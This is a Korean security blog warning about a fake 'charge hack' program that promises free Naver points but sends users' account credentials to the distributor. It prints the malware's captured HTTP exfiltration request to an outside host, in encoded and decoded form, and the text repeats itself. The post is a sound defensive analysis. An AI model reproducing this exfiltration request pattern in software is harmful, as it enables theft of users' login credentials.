반응형
국내 포털 사이트 네이버(Naver) 계정을 수집할 목적으로 제작된 악성코드가 발견되었으므로 인터넷 사용자들은 주의하시기 바랍니다.
해당 악성코드는 국내에서 제작된 것으로 추정되며, 네이버 포인트, 은화를 무료로 충전해주는 충전핵이라는 이름으로 배포가 이루어지고 있습니다.
하지만 실제 계정 정보를 입력한 상태에서 네이버 코인 충전을 시도할 경우 외부로 정보를 유출하는 행위를 하는 것을 확인할 수 있습니다.
위와 같은 방식으로 해당 충전핵 프로그램에서 네이버 계정을 입력한 사용자는 계정 정보를 도용 당하여 추가적인 악의적인 피해를 입을 수 있으므로, 외부에서 제작된 프로그램에 인터넷 사이트 계정 정보를 입력하는 행위를 절대로 하지 않도록 주의하시기 바랍니다.
특히 해당 프로그램은 일부 보안 제품에서 Packer를 통한 사전 진단(AVG : Win32/Themida)만 되는 수준이므로 주의가 요구됩니다.
해당 악성코드는 국내에서 제작된 것으로 추정되며, 네이버 포인트, 은화를 무료로 충전해주는 충전핵이라는 이름으로 배포가 이루어지고 있습니다.
하지만 실제 계정 정보를 입력한 상태에서 네이버 코인 충전을 시도할 경우 외부로 정보를 유출하는 행위를 하는 것을 확인할 수 있습니다.
[211.45.156.97:2757 TCP 네트워크 연결 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(일부 생략)%40%6E%61%76%65%72%2E%63%6F%6D&title=%69%64%74%65%73%74&body=%70%61%73%73%74%65%73%74 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
[네트워크 연결 디코딩 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(프로그램 실행자 IP 주소)@naver.com&title=(프로그램 실행자 네이버 ID)&body=(프로그램 실행자 네이버 Password) HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(일부 생략)%40%6E%61%76%65%72%2E%63%6F%6D&title=%69%64%74%65%73%74&body=%70%61%73%73%74%65%73%74 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
[네트워크 연결 디코딩 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(프로그램 실행자 IP 주소)@naver.com&title=(프로그램 실행자 네이버 ID)&body=(프로그램 실행자 네이버 Password) HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
위와 같은 방식으로 해당 충전핵 프로그램에서 네이버 계정을 입력한 사용자는 계정 정보를 도용 당하여 추가적인 악의적인 피해를 입을 수 있으므로, 외부에서 제작된 프로그램에 인터넷 사이트 계정 정보를 입력하는 행위를 절대로 하지 않도록 주의하시기 바랍니다.
특히 해당 프로그램은 일부 보안 제품에서 Packer를 통한 사전 진단(AVG : Win32/Themida)만 되는 수준이므로 주의가 요구됩니다.
728x90
반응형